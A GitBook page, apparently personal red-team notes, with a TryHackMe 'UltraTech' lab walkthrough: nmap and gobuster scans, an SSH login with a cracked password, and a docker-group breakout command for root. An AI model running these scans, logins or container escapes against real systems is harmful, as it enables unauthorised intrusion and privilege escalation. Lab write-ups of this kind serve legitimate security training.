🔥
Red Team
  • Welcome
    • About
  • Methodologies & Resources
    • Enumeration
    • Gaining Access
    • Payloads
    • Cheat Sheets
      • Transferring Files
      • Privilege Escalation
        • Linux
          • Scripts
            • Bruteforce su
        • Windows
          • Recon Scripts
      • LFI / RFI
      • Buffer Overflow
        • Fuzzers
      • Command Injection
      • Credential Harvesting
      • Password Attacks
      • Command Injection
      • SQL Injection
      • Bypass File Upload
      • Burp
      • Static Binaries
      • File Info Gathering & Script Abuse
      • Credential Gathering & Cracking
      • Other Cheat sheets
      • Lateral Movement and Pivoting
      • Vulnerabilities Seen
      • Active Directory
      • Web
      • Enumeration & Brute Force
  • Walkthroughs
    • Tryhackme
      • Hydra
        • Container Vulnerabilities
      • Blue
      • Steel Mountain
      • Alfred
      • HackPark
      • Game Zone
      • Skynet
      • Daily Bugle
      • Overpass 2 - Hacked
      • Relevant
      • Internal
      • Buffer Overflow Prep
      • File Inclusion
      • Brainstorm
      • Gatekeeper
      • Brainpan 1
      • Upload Vulnerabilities
      • Pickle Rick
      • John The Ripper
      • Attacktive Directory
      • Weaponization
      • Attacking Kerberos
      • Post-Exploitation Basics
      • Common Linux Privesc
      • Linux PrivEsc
      • Basic Pentesting
      • Net Sec Challenge
      • Linux Privilege Escalation
      • Windows Privilege Escalation
      • Password Attacks
      • The Lay of the land
      • Enumeration
      • Windows Local Persistence
      • Lateral Movement and Pivoting
      • Bypassing UAC
      • Hacking with PowerShell
      • Corp
      • Mr Robot CTF
      • Retro
      • Breaching Active Directory
      • Enumerating Active Directory
      • Exploiting Active Directory
      • Persisting Active Directory
      • Credentials Harvesting
      • Red Team Capstone Challenge
      • Crack the hash
      • Ice
      • Bounty Hunter
      • Agent Sudo
      • LazyAdmin
      • Wgel CTF
      • Cyborg
      • Year of the Rabbit
      • Brute It
      • Lian_Yu
      • ToolsRus
      • Chill Hack
      • Bolt
      • source
      • Brooklyn Nine Nine
      • Anthem
      • GamingServer
      • Chocolate Factory
      • Archangel
      • Easy Peasy
      • ColddBox: Easy
      • Fowsniff CTF
      • Blaster
      • The Cod Caper
      • SQL Injection Lab
      • Agent T
      • Avengers Blog
      • Mustacchio
      • Team
      • Tech_Supp0rt: 1
      • Gallery
      • Jack-of-All-Trades
      • Mother's Secret
      • Traverse
      • Anonforce
      • Dav
      • Thompson
      • VulnNet: Internal
      • Library
      • Flatline
      • b3dr0ck
      • Lesson Learned?
      • Opacity
      • Plotted-TMS
      • GLITCH
      • Hacker vs. Hacker
      • Valley
      • magician
      • HeartBleed
      • Expose
      • dogcat
      • Madeye's Castle
        • Old Madeye's Castle
      • Startup
      • Overpass
      • 0day
      • Mindgames
      • HaskHell
      • Annie
      • ContainMe
      • Develpy
      • Watcher
      • Spring
      • Anonymous
      • Boiler CTF
      • Wonderland
      • Blog
      • Biohazard
      • UltraTech
      • The Marketplace
      • CMesS
      • FINISH - Linux Agency
      • Road
      • Tokyo Ghoul
      • GoldenEye
      • Oh My WebServer
      • HA Joker CTF
      • Ollie
      • Looking Glass
      • VulnNet
      • Olympus
      • Wekor
      • Bookstore
      • biteme
      • CMSpit
      • Peak Hill
      • SQHell
      • Zeno
      • ffuf
      • Burp Suite: Repeater
      • Burp Suite: Intruder
      • Burp Suite: Other Modules
      • Burp Suite: Extensions
      • Linux PrivEsc Arena
      • tomghost
      • The Docker Rodeo
      • Empline
      • The Great Escape
      • VulnNet: Active
      • battery
      • Hip Flask
      • TryHack3M: Bricks Heist
      • One Piece
      • Inferno
      • Kitty
      • AVenger
      • Umbrella
      • Stealth
      • Athena
      • Napping
      • CyberLens
      • Obscure
      • Wordpress: CVE-2021-29447
      • File Inclusion, Path Traversal
      • NoSQL Injection
      • Advanced SQL Injection
      • XXE Injection
      • LDAP Injection
      • XSS
      • DOM-Based Attacks
      • CSRF
      • TryHack3M: Sch3Ma D3Mon
      • PrintNightmare
      • GitLab CVE-2023-7028
      • Python for Pentesters
      • PowerShell for Pentesters
      • Web Enumeration
      • Holo
      • Linux: Local Enumeration
      • Linux Process Analysis
      • Windows Network Analysis
      • Bypass
      • CVE-2023-38408
      • SQLMAP
      • Deja Vu
      • SSTI
      • DNS Manipulation
      • Linux Backdoors
      • Linux Modules
      • RustScan
      • Windows PrivEsc
      • Windows PrivEsc Arena
      • Wreath
Powered by GitBook
On this page
  • Initial Scan
  • Scan all ports
  • TCP/8081 - HTTP
  • TCP/31331 - HTTP
  • TCP/22 - SSH
  • Privilege Escalation
  1. Walkthroughs
  2. Tryhackme

UltraTech

PreviousBiohazardNextThe Marketplace

Last updated 11 months ago

Room Link:

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8081 - HTTP

Kali

gobuster dir -u http://$VICTIM:8081 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/31331 - HTTP

Kali

gobuster dir -u http://$VICTIM:31331 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

We can see two intresting users in passwd file

TCP/22 - SSH

Kali

ssh r00t@$VICTIM
Password: n100906

Privilege Escalation

We can see our user is in the docker group so we were able to break out and become a regular user.

Victim

groups

Victim

find / -name docker.sock 2>/dev/null

Victim

docker images

Victim

docker run -it -v /:/host/ bash chroot /host/ bash

Command Injection Payload:

Exploit:

https://github.com/payloadbox/command-injection-payload-list
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation
https://tryhackme.com/room/ultratech1